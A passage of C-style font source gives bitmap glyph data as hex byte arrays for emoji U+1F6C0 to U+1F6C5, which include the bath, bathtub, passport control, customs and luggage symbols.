0x0, 0x3f, 0x80, 0x7, 0x83, 0xb8, 0x0, 0x0,
0x0, 0x7, 0xf0, 0x0, 0x3c, 0x37, 0x0, 0x0,
0x3, 0x80, 0x7c, 0x0, 0x3, 0xc2, 0xe0, 0x0,
0x3, 0xf0, 0x6, 0x0, 0x0, 0x1e, 0x78, 0x0,
0x0, 0xfe, 0x0, 0x0, 0x0, 0x1, 0xfe, 0x0,
0x0, 0x3f, 0x80, 0x0, 0x0, 0xe0, 0xf, 0x80,
0x0, 0x7, 0xf0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x0, 0xfe, 0x0, 0x0, 0x3f, 0x0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0xf, 0xe0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x0, 0x3, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x7, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x0, 0x78,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
/* U+1F6C0 "🛀" */
0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0x8e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0x83, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc1, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x60, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x18, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x70,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc, 0x18,
0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x6, 0xc,
0x0, 0x0, 0x3, 0xff, 0x0, 0x0, 0x3, 0x6,
0x0, 0x0, 0x3, 0xff, 0xc0, 0x7, 0x0, 0xee,
0x0, 0x0, 0x3, 0xff, 0xf0, 0xf, 0xe0, 0x3e,
0x0, 0x0, 0x3, 0xff, 0xfc, 0x6, 0x30, 0x0,
0x7, 0xc0, 0x1, 0xff, 0xfe, 0x6, 0xc, 0x0,
0x7, 0xf0, 0x1, 0xff, 0xff, 0x83, 0x6, 0x0,
0x7, 0x1c, 0x0, 0xff, 0xff, 0xc1, 0x83, 0x0,
0x3, 0x6, 0x0, 0x7f, 0xff, 0xe0, 0xe3, 0x80,
0x1, 0x81, 0x80, 0x3f, 0xff, 0xf0, 0x3f, 0x80,
0x0, 0xc0, 0xc0, 0x1f, 0xff, 0xf8, 0xf, 0x80,
0x0, 0x0, 0x60, 0xf, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x30, 0x3, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x18, 0x1, 0xff, 0xfe, 0x0, 0x0,
0x3, 0xe0, 0xc, 0x0, 0x7f, 0xff, 0x80, 0x0,
0x7, 0xfc, 0x6, 0x0, 0x1f, 0xff, 0xf8, 0x0,
0x7, 0xff, 0x3, 0x0, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf8, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfe, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x6f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe3, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe1, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x30, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x38, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x6, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x81, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x70, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x78,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0xf,
0x0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x0,
0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x70, 0x0, 0x0, 0x0, 0x0, 0x30, 0x0, 0x0,
0x70, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0,
0x7c, 0x0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0,
0x7e, 0x0, 0x0, 0x0, 0x0, 0xf, 0xc0, 0x0,
/* U+1F6C1 "🛁" */
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x70,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xe3, 0x8e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0xf, 0xf9,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x1, 0xfe,
0x30, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x80, 0x31,
0xcc, 0x0, 0x0, 0x0, 0x0, 0x6, 0x70, 0xc,
0x33, 0x80, 0x0, 0x0, 0x0, 0x1, 0x8e, 0x1,
0x8c, 0x60, 0x0, 0x0, 0x0, 0x0, 0x61, 0xe0,
0x63, 0x18, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x3e,
0x18, 0xc6, 0x0, 0x0, 0x0, 0x0, 0x3, 0x83,
0xe6, 0x31, 0x80, 0x0, 0x0, 0x1, 0xe0, 0x70,
0x3f, 0x8c, 0x60, 0x0, 0x0, 0x0, 0xfc, 0xf,
0x3, 0xe3, 0x18, 0x0, 0x0, 0x0, 0x73, 0x81,
0xf0, 0x38, 0xc6, 0x0, 0x0, 0x0, 0x18, 0x60,
0x3f, 0xe, 0x31, 0x80, 0x0, 0x0, 0x6, 0x18,
0x3, 0xff, 0xc, 0x60, 0x0, 0x0, 0x1, 0x86,
0x0, 0x3f, 0xc3, 0x18, 0x0, 0x0, 0x0, 0x73,
0x80, 0x0, 0x47, 0xc6, 0x0, 0x0, 0x0, 0xf,
0xc3, 0xc0, 0x3, 0xf9, 0x80, 0x0, 0x0, 0x1,
0xe1, 0xf8, 0x0, 0xc6, 0x60, 0x0, 0x0, 0xc,
0x0, 0xe7, 0x0, 0x30, 0x98, 0x0, 0x0, 0xf,
0xc0, 0x30, 0xc0, 0x8, 0x26, 0x0, 0x0, 0x7,
0xf8, 0x1c, 0x30, 0x3, 0x19, 0x80, 0x0, 0x3,
0x87, 0xf, 0x9e, 0xf8, 0xc6, 0x60, 0x0, 0x0,
0xc0, 0xc7, 0x7f, 0xff, 0x9f, 0x18, 0x0, 0x0,
0x30, 0x31, 0x86, 0x30, 0x71, 0xc6, 0x0, 0x1f,
0xfe, 0xc, 0xc0, 0xc, 0xf, 0x31, 0xfc, 0x1f,
0xff, 0xef, 0x30, 0x1, 0xf, 0xfc, 0x7f, 0x8e,
0x0, 0xff, 0x8c, 0x0, 0x43, 0xf, 0x18, 0x73,
0x0, 0x3, 0xfb, 0x0, 0x31, 0x81, 0xc6, 0xc,
0xc0, 0x0, 0x1f, 0xe0, 0xc, 0x60, 0x71, 0x83,
0x3f, 0xfe, 0x0, 0xfe, 0x7, 0x18, 0x1c, 0x60,
0xc7, 0xff, 0xf8, 0x7, 0xff, 0x86, 0x7, 0x1c,
0xe0, 0x30, 0x1f, 0xc0, 0x7f, 0xe0, 0xc3, 0xc7,
0xfe, 0xe, 0x0, 0xfe, 0x1, 0xff, 0xff, 0xff,
0xff, 0xc3, 0x80, 0x7, 0xe0, 0x7, 0xff, 0xff,
0xc0, 0x30, 0x60, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0xc, 0x18, 0x0, 0x1, 0xfc, 0x0, 0x0,
0x0, 0x7, 0x6, 0x0, 0x0, 0xf, 0xfc, 0x0,
0x0, 0xf, 0x81, 0xc0, 0x0, 0x0, 0x3f, 0xff,
0xff, 0xff, 0xc0, 0x70, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xff, 0x30, 0xc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xc, 0x3, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x0, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x60, 0x6, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x18, 0x1, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x6, 0x0, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0x80, 0xc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x60, 0x3, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc, 0x0, 0x18, 0x38,
0x0, 0x0, 0x0, 0x3, 0x83, 0x0, 0x7, 0x6e,
0x0, 0x0, 0x0, 0x0, 0xff, 0xc0, 0x0, 0xff,
0xf0, 0x0, 0x0, 0x1, 0xff, 0xe0, 0x0, 0x1f,
0xfc, 0x0, 0x0, 0x0, 0x7f, 0xf0, 0x0, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x0, 0x0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x7, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0,
0x3, 0xf0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0,
0x3, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x7f, 0x80,
0x0, 0xff, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xe0,
0x0, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x3, 0xf8,
0x0,
/* U+1F6C2 "🛂" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x7,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x0,
0x1f, 0xff, 0xff, 0xf0, 0x3, 0xff, 0xfc, 0x0,
0xf, 0xff, 0xff, 0xff, 0xc1, 0xff, 0xfe, 0x0,
0x7, 0xff, 0xff, 0xdf, 0xfc, 0xff, 0xff, 0x0,
0x3, 0xff, 0xff, 0xe0, 0x3e, 0x7f, 0xff, 0x80,
0x3, 0xff, 0xff, 0xf0, 0x7, 0x3f, 0xff, 0xe0,
0x1, 0xff, 0xff, 0xf8, 0x3, 0x9f, 0xff, 0xf8,
0x1, 0xff, 0xff, 0xfc, 0x1, 0xcf, 0xff, 0xfe,
0x1, 0xff, 0xff, 0xfe, 0x0, 0xe7, 0xff, 0xff,
0x81, 0xff, 0xff, 0xff, 0x0, 0x73, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x80, 0x39, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc0, 0x1c, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0xe, 0x7f, 0xff,
0x0, 0xf, 0xff, 0xff, 0xf0, 0x7, 0x3f, 0xff,
0x0, 0x7, 0x7f, 0xff, 0xf8, 0x3, 0x9f, 0xff,
0x0, 0x7, 0x9f, 0xff, 0xfc, 0x1, 0xff, 0xff,
0x0, 0x7, 0x87, 0xff, 0xff, 0x0, 0xff, 0xff,
0x0, 0x7, 0x83, 0xff, 0xff, 0xf0, 0x7f, 0xff,
0x0, 0x3, 0x80, 0xff, 0xff, 0xfe, 0x3f, 0xff,
0x0, 0x3, 0xc0, 0x7f, 0xff, 0xff, 0xff, 0xff,
0x80, 0x3, 0xc0, 0x3f, 0xff, 0xff, 0xff, 0xff,
0x80, 0x3, 0xc0, 0x1f, 0xff, 0xff, 0xff, 0xff,
0x80, 0x81, 0xc3, 0xf, 0xff, 0xff, 0xff, 0xff,
0x0, 0xc1, 0xe1, 0x87, 0xff, 0xff, 0xe0, 0x0,
0x0, 0xe1, 0xe0, 0xc3, 0xff, 0xff, 0xf0, 0x0,
0x0, 0xf1, 0xe0, 0x61, 0xff, 0xff, 0xf8, 0x0,
0x0, 0xf8, 0xf0, 0x30, 0xff, 0xff, 0xfc, 0x0,
0x0, 0xfc, 0xf0, 0x18, 0x7f, 0xff, 0xff, 0xff,
0xff, 0xfe, 0xf0, 0xc, 0x3f, 0xff, 0xff, 0xff,
0xff, 0xff, 0x70, 0x6, 0x1f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x3, 0xf, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x1, 0x87, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x0, 0xc3, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x0, 0x61, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfc, 0x0, 0x30, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfc, 0x0, 0x18, 0x7f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfe, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xff, 0x80, 0x3, 0xf, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x1, 0x87, 0xff, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x0, 0xc3, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf0, 0x0, 0x73, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F6C3 "🛃" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x7,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x0,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x83, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x7, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x7, 0x9f, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x7, 0x87, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x7, 0x83, 0xff, 0xff, 0x8f, 0xff, 0xff,
0x0, 0x3, 0x80, 0xff, 0xff, 0x87, 0xff, 0xff,
0x0, 0x3, 0xc0, 0x7f, 0xff, 0xc3, 0xff, 0xff,
0x0, 0x3, 0xc0, 0x3f, 0xff, 0xe1, 0xff, 0xff,
0x0, 0x3, 0xc0, 0x1f, 0xff, 0xf0, 0xff, 0xff,
0x0, 0x81, 0xc3, 0xf, 0xff, 0xf8, 0x7f, 0xff,
0x0, 0xc1, 0xe1, 0x87, 0xff, 0xfc, 0x3e, 0x0,
0x0, 0xe1, 0xe0, 0xc3, 0xff, 0xfe, 0x1f, 0x0,
0x0, 0xf1, 0xe0, 0x61, 0xff, 0xff, 0xf, 0x80,
0x0, 0xf8, 0xe0, 0x30, 0xff, 0xff, 0x87, 0xc0,
0x0, 0xfc, 0xf0, 0x18, 0x7f, 0xff, 0xc3, 0xff,
0xff, 0xfe, 0xf0, 0xc, 0x3f, 0xff, 0xe1, 0xff,
0xff, 0xff, 0xf0, 0x6, 0x1f, 0xff, 0xf0, 0xff,
0xff, 0xff, 0xf0, 0x3, 0xf, 0xff, 0xf8, 0x7f,
0xff, 0xff, 0xf8, 0x1, 0x87, 0xff, 0xfc, 0x3f,
0xff, 0xff, 0xf8, 0x0, 0xc3, 0xff, 0xfe, 0x1f,
0xff, 0xff, 0xf8, 0x0, 0x61, 0xff, 0xff, 0xf,
0xff, 0xff, 0xf8, 0x0, 0x30, 0xff, 0xff, 0x87,
0xff, 0xff, 0xfc, 0x0, 0x18, 0x7f, 0xff, 0xe3,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x3f, 0xff, 0xff,
0x0, 0x0, 0x1f, 0xff, 0xfe, 0x1f, 0xff, 0xff,
0x80, 0x0, 0xf, 0x80, 0x3, 0xf, 0xff, 0xff,
0xc0, 0x0, 0x7, 0xc0, 0x1, 0x87, 0xff, 0xff,
0xe0, 0x0, 0x3, 0xe0, 0x0, 0xc3, 0xff, 0xff,
0xf8, 0x0, 0x3, 0xf0, 0x0, 0x73, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F6C4 "🛄" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc0, 0x1, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc7, 0xff, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe3, 0xff, 0x8f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf1, 0xff, 0xc7, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0xff, 0xe3, 0xff,
0xff, 0xff, 0xff, 0x81, 0xc0, 0x0, 0x0, 0x3c,
0xf, 0xff, 0xff, 0x80, 0xe0, 0x0, 0x0, 0x1e,
0x3, 0xff, 0xff, 0x80, 0x70, 0x0, 0x0, 0xf,
0x0, 0xff, 0xff, 0xc0, 0x38, 0x0, 0x0, 0x7,
0x80, 0x7f, 0xff, 0xe0, 0x1c, 0x0, 0x0, 0x3,
0xc0, 0x3f, 0xff, 0xf0, 0xe, 0x0, 0x0, 0x1,
0xe0, 0x1f, 0xff, 0xf8, 0x7, 0x0, 0x0, 0x0,
0xf0, 0xf, 0xff, 0xfc, 0x3, 0x80, 0x0, 0x0,
0x78, 0x7, 0xff, 0xfe, 0x1, 0xc0, 0x0, 0x0,
0x3c, 0x3, 0xff, 0xff, 0x0, 0xe0, 0x0, 0x0,
0x1e, 0x1, 0xff, 0xff, 0x80, 0x70, 0x0, 0x0,
0xf, 0x0, 0xff, 0xff, 0xc0, 0x38, 0x0, 0x0,
0x7, 0x80, 0x7f, 0xff, 0xe0, 0x1c, 0x0, 0x0,
0x3, 0xc0, 0x3f, 0xff, 0xf0, 0xe, 0x0, 0x0,
0x1, 0xe0, 0x1f, 0xff, 0xf8, 0x7, 0x0, 0x0,
0x0, 0xf0, 0xf, 0xff, 0xfc, 0x3, 0x80, 0x0,
0x0, 0x78, 0x7, 0xff, 0xfe, 0x1, 0xc0, 0x0,
0x0, 0x3c, 0x3, 0xff, 0xff, 0x0, 0xe0, 0x0,
0x0, 0x1e, 0x1, 0xff, 0xff, 0x80, 0x70, 0x0,
0x0, 0xf, 0x0, 0xff, 0xff, 0xc0, 0x38, 0x0,
0x0, 0x7, 0x80, 0x7f, 0xff, 0xe0, 0x1c, 0x0,
0x0, 0x3, 0xc0, 0x3f, 0xff, 0xf0, 0xe, 0x0,
0x0, 0x1, 0xe0, 0x1f, 0xff, 0xf8, 0x7, 0x0,
0x0, 0x0, 0xf0, 0xf, 0xff, 0xfc, 0x3, 0x80,
0x0, 0x0, 0x78, 0x7, 0xff, 0xfe, 0x1, 0xc0,
0x0, 0x0, 0x3c, 0x3, 0xff, 0xff, 0x0, 0xe0,
0x0, 0x0, 0x1e, 0x1, 0xff, 0xff, 0x80, 0x70,
0x0, 0x0, 0xf, 0x0, 0xff, 0xff, 0xc0, 0x38,
0x0, 0x0, 0x7, 0x80, 0x7f, 0xff, 0xf0, 0x1c,
0x0, 0x0, 0x3, 0xc0, 0x7f, 0xff, 0xfc, 0xe,
0x0, 0x0, 0x1, 0xe0, 0x7f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe3,
0xf8, 0x7f, 0x1f, 0xc7, 0xf8, 0xff, 0xff, 0xe0,
0xf8, 0x1f, 0x7, 0xc1, 0xf8, 0x3f, 0xff, 0xf0,
0x7c, 0xf, 0x83, 0xe0, 0xfc, 0x1f, 0xff, 0xf8,
0x3e, 0x7, 0xc1, 0xf0, 0x7e, 0xf, 0xff, 0xfc,
0x1f, 0x3, 0xe0, 0xf8, 0x3f, 0x7, 0xff, 0xff,
0x1f, 0xc3, 0xf8, 0xfe, 0x3f, 0xc7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F6C5 "🛅" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf8, 0x3f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf9, 0xef, 0xff, 0xff, 0xff,
